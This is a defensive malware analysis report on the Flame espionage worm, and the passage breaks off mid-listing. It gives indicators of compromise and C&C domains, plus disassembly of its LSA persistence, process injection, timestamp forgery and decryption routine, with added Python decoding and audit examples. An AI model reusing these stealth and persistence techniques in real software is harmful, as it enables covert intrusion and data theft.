Analysis Report on the Flame Worm Sample Set

Antiy Security Research and Emergency Response Center (Antiy CERT)

First published: 31 May 2012

This version updated: 17 August 2012

 


Notes from the analysis team

    In our working experience we had never before seen a situation like this: a small analysis team spent close to a month facing a single piece of malicious code, and still plans to carry the work on. We attempted something similar with the Stuxnet worm, but that team worked for less than ten days before stopping short. Since we began analysing Stuxnet, Duqu and Flame one after another, we have gradually come to see that, as traditional AVERs (anti-virus researchers), our traditional methods have to be broken when we face such challenges and changes.
The main purpose of traditional malicious code was to infect as many computers as possible, later evolving into a chain of profit, so its development was simple and direct and its functions were clear. It usually came as a single file, kept as small as possible to spread reliably, which made it relatively easy to analyse. In another sense, although the underground economy gave rise to the explosion of Trojans, bots and the like, it did not upset the balance between attacker and defender: relying on capture systems and back-end automated analysis platforms, almost every anti-virus vendor could handle massive volumes of malicious code with very little manual analysis. Even with automated systems alone, running unattended, new detection rules could be extracted from new samples and distributed to anti-virus products. As a result we grew lazy, relying too much on sandboxes and the other automated stages, and at one point we even believed that the mission of the virus analyst was fading away.
Today, facing viruses such as Stuxnet and Flame, everything is different. What users ask us is no longer "how do you detect it, can your product remove it?" but "what did it actually do?" and "how do I avoid similar attacks in the future?". All of this forces us to turn from operators of an analysis pipeline back into hand-to-hand fighters: we have to return to close-quarters scene investigation, environment reproduction and deep, meticulous back-end analysis.
The number of Flame's files and their total size are staggering. Like the malicious code we had previously seen in APT scenarios, such samples are developed in a modular, framework-based way, with a complex structure and many files, but Flame takes this to an almost unimaginable degree. Its division into modules also gives it good stealth and a strong ability to evade anti-virus software, and it wraps various encryption modules internally to hide important information. These large, structurally complex pieces of malicious code carry out precise tasks in APT attacks: they inspect the characteristics of the environment very accurately, and if the environment does not match the target of the infection they exit at once and remove their traces completely. Such samples do not break out on a large scale; they rely on a large amount of configuration information and remote scheduling to do their work, and by the time they are discovered the objective has usually been achieved. Our habit of analysing single-file virus samples, relying on automated analysis results and a little disassembly, including the habitual practice of putting a sample label with a HASH value in front of an analysis report, all looks naive and outdated in the face of such a complex situation.
So, faced with so many samples and derived files, we finally chose the "ants moving house" approach: each member of the team analysed a different module and noted down the results as they went. We do not expect a single huge research report at the end, but we hope to gather these fragments to provide some research basis for responding to this kind of attack. The team followed two lines of work. The first is analysis of the main module: the main module file is over 6 MB, a lot of time went into it, and the work concentrated on its encryption algorithms, string information and overall structure. The second is analysis of the functions of the other modules; while analysing them we found that some modules share the same functions, such as information collection, process enumeration and screen capture. During the analysis we also found a lot of interesting information in memory, but we are still stuck "guessing riddles".
We will continue our work and try to update this report with more results. Being able to keep doing something meaningful over a period of time is a kind of happiness, especially when doing it together with partners.

 

Antiy Labs Security Research and Emergency Response Center
Pluck、Sky、White、Pillcor
2012.07.31

1 Background

Antiy Labs has been capturing Flame worm samples since 28 May 2012. To date Antiy has captured 6 variants of the Flame worm's main file and more than 20 other module samples with distinct HASH values, and has generated further derived files from these samples. Antiy set up a dedicated analysis team; through continued analysis it established that Flame is information-stealing malware implemented as a complex multi-module structure. Its main module is over 6 MB in size and contains large amounts of encrypted data, embedded open-source code (such as Lua), exploit code, module configuration files, multiple encryption and compression algorithms, information-theft modules and more. Among the exploit modules we found the USB attack module used by Stuxnet; the Stuxnet incident was the 2010 APT attack against Iran's nuclear facilities [1].
According to existing external analysis, this malware has been operating very cautiously for at least two years [2]. It can steal files, take screenshots of the user's system, spread via USB and disable security vendors' products, and propagate to other systems under certain conditions; it may also exploit known or already patched vulnerabilities in Microsoft Windows to launch attacks and spread widely within a network.
Current industry assessments of the worm are as follows: McAfee considers this threat a continuation of the Stuxnet and Duqu attacks [3]; Kaspersky Lab considers the Flame attack one of the most complex attacks found so far [4], a backdoor Trojan with worm characteristics. Symantec believes that Flame, like the two earlier threats Stuxnet and Duqu, was not written by one person but by an organised, funded cyber-crime group with a clear direction.

2 Flame Worm File Information

Table 2-1 Known Flame worm PE files and their functions (columns: file name; MD5 and size; function)

File name: mssecmgr.ocx
MD5 (size):
  b51424138d72d343f22d03438fc9ced5 (1,236,992 bytes)
  0a17040c18a6646d485bde9ce899789f (6,172,160 bytes)
  ee4b589a7b5d56ada10d9a15f81dada9 (892,417 bytes)
  e5a49547191e16b0a69f633e16b96560 (6,166,528 bytes)
  bdc9e04388bda8527b398a8c34667e18 (1,236,992 bytes)
  37c97c908706969b2e3addf70b68dc13 (391,168 bytes)
Function: Main module. After it runs it decrypts and drops several functional modules from its resources and injects them into multiple system processes. It calls Lua to run scripts that perform the designated functions.

File name: advnetcfg.ocx
MD5 (size):
  f0a654f7c485ae195ccf81a72fe083a2 (643,072 bytes)
  8ed3846d189c51c6a0d69bdc4e66c1a5 (421,888 bytes)
  bb5441af1e1741fca600e9c433cb1550 (643,944 bytes)
Function: Dropped by the main module; captures screen contents.

File name: msglu32.ocx
MD5 (size):
  d53b39fb50841ff163f6e9cfd8b52c2e (1,721,856 bytes)
  2512321f27a05344867f381f632277d8 (1,729,536 bytes)
Function: Dropped by the main module; enumerates files of various types on the system, reads information from files of specific types and writes it into an SQL database. It can also collect geographically related information from the files.

File name: nteps32.ocx
MD5 (size):
  c9e00c9d94d1a790d5923b050b0bd741 (827,392 bytes)
  e66e6dd6c41ece3566f759f7b4ebfa2d (602,112 bytes)
  5ecad23b3ae7365a25b11d4d608adffd (827,392 bytes)
Function: Dropped by the main module; keylogging and screen capture. Monitors certain e-mail domain names.

File name: rpcns4.ocx / soapr32.ocx
MD5 (size):
  296e04abb00ea5f18ba021c34e486746 (160,768 bytes)
  1f9f0baa3ab56d72daab024936fdcaf3 (188,416 bytes)
  cc54006c114d51ec47c173baea51213d (253,952 bytes)
  e6cb7c89a0cae27defa0fd06952791b2 (349,596 bytes)
Function: Information-collection module. Gathers system information such as installed software, network information, wireless network information, USB information, time and time zone.

File name: comspol32.ocx
MD5 (size):
  20732c97ef66dd97389e219fc0182cb5 (634,880 bytes)
Function: Under analysis.

File name: 00004784.dll (jimmy.dll)
MD5 (size):
  ec992e35e794947a17804451f2a8857e (483,328 bytes)
Function: Collects information about the user's computer, including window titles, registry key values, computer name, disk types and so on.

File name: wusetupv.exe
MD5 (size):
  1f61d280067e2564999cac20e386041c (29,928 bytes)
Function: Collects information on each local network interface, process information, registry key values and so on.

File name: DSMGR.DLL / browse32.ocx
MD5 (size):
  2afaab2840e4ba6af0e5fa744cd8f41f (116,224 bytes)
  7d49d4a9d7f0954a970d02e5e1d85b6b (458,869 bytes)
Function: Removes all traces of the malware to hinder forensic analysis.

File name: boot32drv.sys / 00004069.exe
MD5 (size):
  06a84ad28bbc9365eb9e08c697555154 (49,152 bytes)
Function: An encrypted data file rather than a PE file; the encryption is an XOR with 0xFF.

Table 2-2 List of all Flame derived files and other files


 

 

 

3 Functional Analysis

3.1 Analysis of the MSSECMGR.OCX Main Module

The worm's main module is a DLL named mssecmgr.ocx; we found that this module already exists in several derived versions. The file is about 6 MB; after it runs it connects to the C&C server and tries to download or update other modules. The main module's file name differs on infected machines at different times, but its extension is always "OCX". Once running, the main module decrypts and drops several functional modules from its resources and injects them into multiple processes; these modules gather process information, keystrokes, hardware information, screen contents, microphone audio, storage devices, network, WiFi, Bluetooth, USB and other information. The recorded information files are stored under %Windir%\temp\. The worm first reconnoitres the infected system, and if it is not the intended target it automatically uninstalls itself. The worm most probably spreads across the local network by spoofing the Microsoft update server, and via USB devices plugged into the machine. It can also discover information about nearby devices: through Bluetooth it looks for other devices such as mobile phones or laptops. This worm differs greatly from earlier worms: the main module is very large and contains multiple functional modules, with an embedded Lua interpreter and many Lua scripts for high-level functional extension; its startup method is unusual, and it uses several compression and encryption schemes.

Local behaviour
  • Registry addition
  • HKLM\SYSTEM\CurrentControlSet\Control\Lsa
  • Authentication Packages = mssecmgr.ocx
  • Note: this value causes mssecmgr.ocx to be loaded at boot. The file path is %system32%\mssecmgr.ocx

  • After running, the file drops the following files:
  • Resource "146" is decrypted, released and loaded; the modules dropped from it are:

    File                          MD5
    %System32%\advnetcfg.ocx      BB5441AF1E1741FCA600E9C433CB1550
    %System32%\boot32drv.sys      C81D037B723ADC43E3EE17B1EEE9D6CC
    %System32%\msglu32.ocx        D53B39FB50841FF163F6E9CFD8B52C2E
    %System32%\nteps32.ocx        C9E00C9D94D1A790D5923B050B0BD741
    %System32%\soapr32.ocx        296E04ABB00EA5F18BA021C34E486746
    %System32%\ccalc32.sys        5AD73D2E4E33BB84155EE4B35FBEFC2B

    Other files:

  • %Windir%\Ef_trace.log
  • The directory %ProgramFiles%\Common Files\Microsoft Shared\MSAudio holds the configuration information for each module and a copy of the worm itself; module configuration updated or downloaded from the network is also placed here. The list is as follows:

  • Audcache
  • audfilter.dat
  • dstrlog.dat
  • lmcache.dat
  • ntcache.dat
  • mscrypt.dat
  • During analysis we found that the files above are probably the virus's configuration files: before performing an operation the virus first reads a block of information from them and then carries out the specified operation. The virus drops the files above, deletes them once, and finally drops them again; we presume this is caused by different functions repeating the same operation.

  • wavesup3.drv (copy of itself)
  • wpgfilter.dat
  • According to the configuration in resource "146", the following directories may also exist:

  • %ProgramFiles%\Common Files\Microsoft Shared\MSSecurityMgr
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAudio
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAuthCtrl
  • %ProgramFiles%\Common Files\Microsoft Shared\MSAPackages
  • %ProgramFiles%\Common Files\Microsoft Shared\MSSndMix
  • Enumeration of security processes
  • For the list of security processes enumerated see Appendix I (Appendix I: the list of security processes enumerated in Mssecmgr.ocx; some of the processes in this list also appear in the process lists enumerated by other modules.)

  • A list of the Lua script call functions found in the main module is given in Appendix VI (Appendix VI: the list of Lua script call functions in Mssecmgr.ocx).
  • The worm's main functions include: scanning network resources, stealing specified information, taking screenshots, recording voice calls, using PE-encrypted resources, storing the collected information in an SQLite database, communicating with the C&C (control) server over SSH and HTTPS, detecting over a hundred security products, using encrypted log files, and spreading via USB and local-network attacks.
  • Network behaviour
  • Address 1: http://windowsuate.microsoft.com/
    Address 2: http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx
    Protocol: HTTP
    Port: 80
    Address: 91.135.66.118 [traffic-spot.com] [traffic-spot.biz] [smart-access.net] [quick-net.info]
    Protocol: HTTPS
    Port: 443
    After running, the virus first accesses the Windows update server address, then accesses the four domain names that resolve to IP address 91.135.66.118 and sends data back to them.

     

    Figure 3-1 POST data

    For all the domain names it connects to see Appendix II (Appendix II: list of all connected domain names).

    Sample file startup and load order

    Figure 3-2 File startup and load order

    The virus is loaded in one of two ways: by adding a registry value, or by using a batch file to run a DOS command that launches Rundll32.exe to load the main module.
    It first queries the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit and checks whether the file %Program Files%\Common Files\Microsoft Shared\MSAudio\wavesup3.drv exists. It writes the value 114 to HKLM\System\CurrentControlSet\Control\TimeZoneInformation\StandardSize.
    It creates the MSSecurityMgr directory and writes the file Mscrypt.dat; each time it queries this information file it sets the file's modification time to 1601-1-1 08:00:00. After one minute it writes Wpgfilter.dat, again setting the modification time to 1601-1-1 08:00:00 after each query; after roughly another minute it writes Wavesup3.drv, whose modification time is likewise set to 1601-1-1 08:00:00 after each query. After writing Wavesup3.drv it writes the Audcache file and then Audfilter.dat. It then looks for the following files:

  • C:\Documents and Settings\Administrator\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\All Users\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\Default User\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\LocalService\Local Settings\Temp\dat3C.tmp
  • C:\Documents and Settings\NetworkService\Local Settings\Temp\dat3C.tmp
  • C:\WINDOWS\Temp\dat3C.tmp
  • It then injects into the Services.exe process, where it calls the system file Shell32.dll and hijacks its contents: it loads the contents of Wpgfilter.dat into Shell32.dll, then the contents of Audcache, and then loads the Wavesup3.drv file. It then drops Neps32.exe, Comspol32.ocx, Advnetcfg.ocx, Boot32drv.sys and Msglu32.ocx and sets their timestamps to those of Kernel32.dll in order to evade detection by security software.
    It then injects into the Winlogon.exe process, calls the system file Shell32.dll and hijacks its contents, loading the contents of Nteps32.ocx and Ccalc32.sys into Shell32.dll, and again sets their timestamps to those of Kernel32.dll to evade detection by security software.
    By injecting into the Explorer.exe process it calls the system file Shell32.dll, hijacks its contents and has it create an Iexplore.exe process; it loads the contents of Wpgfilter.dat into Shell32.dll, then the contents of Audcache, and a few minutes later loads Wavesup3.drv. It queries the system services entries in the registry, connects to the Microsoft update server, and then connects to the virus's own server.
    Large amounts of data in the program are encrypted. The decryption routine is located as follows:

    0x1000E3F5  proc near                ; edx = length, eax = buffer (decrypted in place)
                    test    edx, edx
                    push    esi
                    mov     esi, eax
                    jbe     short 0x1000E42F       ; nothing to do for length 0
                    push    ebx
                    push    edi
                    push    0Bh
                    pop     edi
                    sub     edi, esi               ; edi = 0xB - start, so edi+esi = 0xB + offset
    0x1000E403:
                    lea     ecx, [edi+esi]         ; ecx = 0xB + n
                    lea     eax, [ecx+0Ch]         ; eax = 0xB + 0xC + n
                    imul    eax, ecx
                    add     eax, dword_10376F70    ; per-sample constant
                    mov     ecx, eax
                    shr     ecx, 18h
                    mov     ebx, eax
                    shr     ebx, 10h
                    xor     cl, bl
                    mov     ebx, eax
                    shr     ebx, 8
                    xor     cl, bl
                    xor     cl, al                 ; cl = xor of the four bytes of eax
                    sub     [esi], cl              ; decrypt one byte in place
                    inc     esi
                    dec     edx
                    jnz     short 0x1000E403
                    pop     edi
                    pop     ebx
    0x1000E42F:
                    pop     esi
                    retn
    0x1000E3F5  endp

    This function is called from two places:

    1000E451                 movzx   edx, word ptr [ebx+9]
    1000E455                 lea     eax, [ebx+0Bh]
    1000E458                 mov     [ebp+8], eax
    1000E45B                 call    0x1000E3F5

    1000E498                 movzx   edx, word ptr [esi+12h]
    1000E49C                 lea     ebx, [esi+14h]
    1000E49F                 mov     eax, ebx
    1000E4A1                 call    0x1000E3F5

    Description of the decryption algorithm:
    The function takes two parameters: edx = length of the string to decrypt, eax = start address of the encrypted string.
    Return value: eax = start address of the decrypted string (decryption is done in place).
    Algorithm, for the byte at offset n from the start of the string:
    ECX = (0xB + n) * (0xB + 0xC + n) + [0x10376F70]
    CL = M1 xor M2 xor M3 xor M4, where M1..M4 are the four bytes of ECX (bits 31..24, 23..16, 15..8 and 7..0)
    decrypted byte = encrypted byte - CL
    First call site:
    The caller takes one parameter, arg.1 (an address)
    Length of the string to decrypt: the word at arg.1 + 0x9
    Start address of the string to decrypt: arg.1 + 0xB
    Return value: start address of the decrypted string
    Second call site:
    The caller takes one parameter, arg.1 (an address)
    Length of the string to decrypt: the word at arg.1 + 0x12
    Start address of the string to decrypt: arg.1 + 0x14
    Return value: start address of the decrypted string
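The routine above re-implemented in Python, as an added example for this report (not code from the sample or from Antiy): it reproduces the keystream and the in-place subtraction, and handles the two record layouts seen at the call sites 0x1000E451 and 0x1000E498. The constant dword_10376F70 is not given in the report, so SAMPLE_KEY is a labelled placeholder, and the test records are constructed with the inverse transform.

```python
"""Re-implementation of the in-place string decryption routine at 0x1000E3F5.

Added example for this report, not code from the Flame sample or from Antiy.
Assumptions (labelled): the per-sample constant dword_10376F70 is not given
in the report, so SAMPLE_KEY is a constructed placeholder; the records used
for testing are constructed here and encrypted with the inverse transform.
"""

SAMPLE_KEY = 0x12345678  # placeholder for dword_10376F70, not the real value

# (length offset, data offset) for the two call sites in the report.
CALL_SITE_1 = (0x9, 0xB)    # 0x1000E451: movzx edx,[ebx+9]  / lea eax,[ebx+0Bh]
CALL_SITE_2 = (0x12, 0x14)  # 0x1000E498: movzx edx,[esi+12h] / lea ebx,[esi+14h]


def keystream_byte(n: int, key: int) -> int:
    """CL for the byte at offset n: fold the four bytes of ECX into one byte.

    ECX = (0xB + n) * (0xB + 0xC + n) + key   (32-bit, wraps like imul/add)
    CL  = ECX[31:24] ^ ECX[23:16] ^ ECX[15:8] ^ ECX[7:0]
    """
    ecx = ((0xB + n) * (0xB + 0xC + n) + key) & 0xFFFFFFFF
    return ((ecx >> 24) ^ (ecx >> 16) ^ (ecx >> 8) ^ ecx) & 0xFF


def decrypt(data: bytes, key: int = SAMPLE_KEY) -> bytes:
    """Equivalent of the loop: 'sub [esi], cl' over edx bytes starting at eax."""
    return bytes((b - keystream_byte(n, key)) & 0xFF for n, b in enumerate(data))


def encrypt(data: bytes, key: int = SAMPLE_KEY) -> bytes:
    """Inverse transform (add instead of sub); used only to build test input."""
    return bytes((b + keystream_byte(n, key)) & 0xFF for n, b in enumerate(data))


def decrypt_record(blob: bytes, length_off: int, data_off: int,
                   key: int = SAMPLE_KEY) -> bytes:
    """Decrypt a record laid out the way one of the two call sites expects.

    The length is a little-endian 16-bit word (movzx edx, word ptr [...]) and
    the encrypted data follows inline at data_off.
    """
    length = int.from_bytes(blob[length_off:length_off + 2], "little")
    if data_off + length > len(blob):
        raise ValueError("record length exceeds the available data")
    return decrypt(blob[data_off:data_off + length], key)


def build_record(plaintext: bytes, length_off: int, data_off: int,
                 key: int = SAMPLE_KEY) -> bytes:
    """Construct a record in a call-site layout (constructed test data only)."""
    header = bytearray(data_off)
    header[length_off:length_off + 2] = len(plaintext).to_bytes(2, "little")
    return bytes(header) + encrypt(plaintext, key)


if __name__ == "__main__":
    sample = b"mssecmgr.ocx"  # constructed plaintext, not recovered from the sample
    record = build_record(sample, *CALL_SITE_2)
    print(decrypt_record(record, *CALL_SITE_2))
```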

    Implementation details

    While debugging the virus we found that it encodes every pointer with EncodePointer before storing it in its internal structures (similar to the implementation in Duqu) and calls DecodePointer when the pointer is used, which makes static analysis extremely difficult. The virus obtains function addresses dynamically by reading the export table of a system DLL and looping through it to find the named function, a customary technique of malicious code; see the code below.

    mov     eax, [ebp-4]
    mov     eax, [esi+eax*4]        //export func name offset
    add     eax, [ebp+module_handle]
    push    [ebp+func_name_size]
    mov     [ebp+export_func_name], eax
    push    eax
    call    IsBadReadPtr
    test    eax, eax
    jnz     0x1000BE19
    push    [ebp+func_name]
    push    [ebp+export_func_name]
    call    lstrcmpiA
    test    eax, eax
    jz      short 0x1000BE2B

    Figure 3-3 Dynamically obtaining a function from a specified DLL

    The malicious code creates the MSSecurityMgr folder under the system path %ProgramFiles%\Common Files\Microsoft Shared and saves some configuration files into it. It stores the key system directories (the WINDOWS directory, the SYSTEM32 directory and the system temp directory) and its own file path in the process's environment variables. It uses the file-search API functions to locate Kernel32.dll and sets the timestamps of the files and folders it creates to match those of Kernel32.dll, in order to hide its traces.
    The malicious code first copies itself to %System32%\mssecmgr.ocx and then achieves startup by modifying the registry. The modified value is "Authentication Packages" under
    "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa",
    to which it appends the name of its module, as shown in Figure 3-4. This registry value lists the user authentication packages, which are loaded and called when a user logs on to the system [5]; this gives the worm its boot-time start.

    Figure 3-4 Modified registry value

     

    The virus enumerates processes to find Explorer.exe, writes shellcode into that process with WriteProcessMemory, and creates a remote thread with CreateRemoteThread to execute the shellcode.
    During debugging, encrypted data was found and dropped to the specified directory:
    C:\Program Files\Common Files\Microsoft Shared\MSSecurityMgr\mscrypt.dat
    The data in this module should be configuration data.
    Analysis of the program's process operations
    The program opens the services.exe process with OpenProcess; the handle is 0x174.
    It writes shellcode into the Services.exe process with WriteProcessMemory. This is a common malware technique: the code with obviously malicious behaviour is injected into a system process for execution in order to evade anti-virus detection.
    The first shellcode is 0x82 bytes long.


    The second shellcode is executed directly by the remote thread created afterwards; it is 0x70C bytes long.


    The third write continues at the address following the shellcode above; the data written is 4 bytes long:
    0x00,0x00,0x00,0x00
    The fourth write again continues at the address following the shellcode above:
    the shellcode is the following file, with a length of 0x5E2330.
    Finally the malicious code calls CreateRemoteThread to create a remote thread that executes the shellcode just written into the Services.exe process.
    Registry operations observed:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SeCEdit
        1. Suspected Group Policy key
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation
        1. StandardSize: modifies the standard time

    Startup (persistence):
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages
    New: type: REG_MULTI_SZ, length: 21 (0x15) bytes
        6D 73 76 31 5F 30 00 6D 73 73 65 63 6D 67 72 2E  |  msv1_0.mssecmgr.
        6F 63 78 00 00                                   |  ocx..
    Old: type: REG_MULTI_SZ, length: 8 (0x8) bytes
        6D 73 76 31 5F 30 00 00                          |  msv1_0..
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnEndLocation
    New: string: "10675834"
    Old: string: "0"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnStartLocation
    New: string: "10485101"
    Old: string: "0"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeComplete
    New: string: "Yes"
    Old: string: "No"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeError
    New: string: " "
    Old: string: "Missing Registry Entries"
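A defender-side check of the persistence value above, written for this report as an added example (not Antiy's or any project's code): it parses a REG_MULTI_SZ blob as recorded by a registry monitor (the "new" and "old" bytes are taken from the dump above) and flags any authentication package not in a baseline. The baseline of only msv1_0 and the UTF-16 handling are assumptions: a live value is stored as UTF-16-LE, and other packages may legitimately be present on a given system.

```python
"""Audit the LSA 'Authentication Packages' REG_MULTI_SZ value for extra entries.

Added example for this report, not Antiy's tooling. The blobs below are
constructed from the hex dump recorded in the report; the baseline and the
UTF-16 handling are assumptions (see the lead-in).
"""

# From the report's dump: "msv1_0\0mssecmgr.ocx\0\0" (21 bytes, single-byte chars).
AUTH_PACKAGES_NEW = bytes.fromhex("6D7376315F30006D737365636D67722E6F63780000")
# From the report's dump: "msv1_0\0\0" (8 bytes), the value before infection.
AUTH_PACKAGES_OLD = bytes.fromhex("6D7376315F300000")

# Assumed baseline: a default Windows XP/2003 install lists only msv1_0.
# Add any other packages that are legitimately deployed in your estate.
BASELINE = {"msv1_0"}


def parse_multi_sz(blob: bytes) -> list[str]:
    """Split a REG_MULTI_SZ blob into its strings.

    The registry stores REG_MULTI_SZ as UTF-16-LE, but the monitor that
    produced the report's dump printed single-byte characters, so both are
    accepted: an even-length blob whose odd bytes are all zero is treated as
    UTF-16-LE (an assumption that holds for ASCII package names).
    """
    if blob and len(blob) % 2 == 0 and all(b == 0 for b in blob[1::2]):
        text = blob.decode("utf-16-le")
    else:
        text = blob.decode("latin-1")
    # The list ends with an empty string (double NUL); empty items are dropped.
    return [s for s in text.split("\x00") if s]


def unexpected_packages(blob: bytes, baseline=BASELINE) -> list[str]:
    """Entries not in the baseline; registry names compare case-insensitively."""
    allowed = {name.lower() for name in baseline}
    return [p for p in parse_multi_sz(blob) if p.lower() not in allowed]


def audit(blob: bytes, baseline=BASELINE) -> dict:
    """Summarise one value: the parsed packages and those needing a closer look."""
    extra = unexpected_packages(blob, baseline)
    return {"packages": parse_multi_sz(blob), "unexpected": extra, "clean": not extra}


if __name__ == "__main__":
    for label, blob in (("old", AUTH_PACKAGES_OLD), ("new", AUTH_PACKAGES_NEW)):
        print(label, audit(blob))
```

An unexpected entry names a DLL that LSASS will load at logon, so each one should be resolved to its file under %System32% and examined; the report's mssecmgr.ocx is exactly such an entry.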
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit
    HKLM\Software\Microsoft\Internet Explorer\LowRegistry
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option
    HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation
    HKLM\SOFTWARE\Symantec\Norton AntiVirus
    HKLM\SOFTWARE\Symantec\InstalledApps
    HKLM\SOFTWARE\KasperskyLab\avp6\settings
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings
    HKLM\SOFTWARE\KasperskyLab
    HKLM\SOFTWARE\Symantec\SymSetup\Internet security
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    HKLM\SOFTWARE\Symantec\Symantec AntiVirus
    HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
    HKIU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    HKLM\Software\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\%s\properties
    Flame was found to enumerate all top-level windows on the system, looking for a window whose class name and window name are both "Pageant", and to send it a message. Pageant is confirmed to be the authentication agent of the PuTTY program: a user's private key can be added to it, and after the password is entered on the first login to a server Pageant keeps it, so that no password needs to be entered afterwards.
    SendMessageA( Msg=0x4a, wParam=0x00, lParam=0x804e50ba)    (0x4A is WM_COPYDATA)
    Flame was also found to create a new desktop, then create an Iexplore.exe process with its default desktop set to the newly created one, probably in order to hide the launch.

    mov     [ebp+StartupInfo.cb], 44h
    mov     eax, lpszDesktop
    mov     [ebp+StartupInfo.lpDesktop], eax ; set desktop
    mov     [ebp+CommandLine], bl
    mov     esi, 104h
    push    esi
    push    ebx
    lea     eax, [ebp+VersionInformation]
    push    eax             ; pVersionInformation
    call    0x101A1130
    add     esp, 0Ch
    push    esi             ; nSize
    lea     eax, [ebp+CommandLine]
    push    eax          ; "%ProgramFiles%\Internet Explorer\iexplore.exe"
    push    environment_strings
    call    ExpandEnvironmentStringsA
    cmp     eax, ebx
    jz      0x100E3157
    cmp     eax, esi
    ja      0x100E3157
    lea     eax, [ebp+ProcessInformation]
    push    eax             ; lpProcessInformation
    lea     eax, [ebp+StartupInfo]
    push    eax             ; lpStartupInfo
    push    ebx             ; lpCurrentDirectory
    push    ebx             ; lpEnvironment
    push    4               ; dwCreationFlags
    push    ebx             ; bInheritHandles
    push    ebx             ; lpThreadAttributes
    push    ebx             ; lpProcessAttributes
    lea     eax, [ebp+CommandLine]
    push    eax             ; lpCommandLine
    push    ebx             ; lpApplicationName
    call    ds:CreateProcessA

    A large number of SQL statements were found during analysis; they operate on data in SQLite databases. Several of them (the vacuum_db and sqlite_rename_* statements) are the SQLite library's own internal statements, consistent with an embedded SQLite engine; the others reference the malware's own tables (Configuration, STORAGE_LENGTH, STORAGE_SIZE).

    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
    UPDATE %s SET Grade = (SELECT %d/%d.0*(rowid - 1) FROM st WHERE st.ProdID = %s.ProdID);
    ELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    INSERT OR REPLACE INTO Configuration (Name, App, Value) VALUES('%s','%s' ,'%s');
    INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_LENGTH','%s',0);
    UPDATE sqlite_master SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    UPDATE %s SET Value = Value - old.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';
    UPDATE %s SET Value = Value + 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';
    SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    UPDATE %s SET Value = Value - 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';
    UPDATE %s SET Value = Value + new.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';
    UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_SIZE','%s',0);

    WQL

    WQL stands for WMI Query Language, the query language of Windows Management Instrumentation. The following namespace and queries were found:
    root\ CIMV2
    select * from Win32_LogicalDisk
    SELECT * FROM __InstanceOperationEvent WITHIN %d WHERE TargetInstance ISA 'Win32_LogicalDisk'
    select ProcessID, Name from Win32_Process

    The following named pipes are created:

    \\.\pipe\navssvcs
    \\.\pipe\PipeGx16
    \\.\\pipe\spoolss
    During analysis some functions were found to contain junk-like instructions that have no effect on the program's behaviour, such as the mov eax, eax, the push/pop pairs and the pusha/popa in the listing below (highlighted in red in the original report).

    push    ebp
    mov     ebp, esp
    push    ebx
    push    esi
    push    edi
    mov     eax, eax
    push    ebx
    push    eax
    pop     eax
    pop     ebx
    pusha
    popa
    mov     esi, [ebp+8]

    In a separate thread Flame adjusts its privileges, opens the service manager and creates a service, and loads and runs the Rdcvlt32.exe program.

    push    edi             ; lpPassword
    push    edi             ; lpServiceStartName
    push    edi             ; lpDependencies
    push    edi             ; lpdwTagId
    push    edi             ; lpLoadOrderGroup
    push    PathName        ; lpBinaryPathName = "%windir%\system32\rdcvlt32.exe"
    push    edi             ; dwErrorControl
    push    3               ; dwStartType
    push    10h             ; dwServiceType
    push    0F01FFh         ; dwDesiredAccess
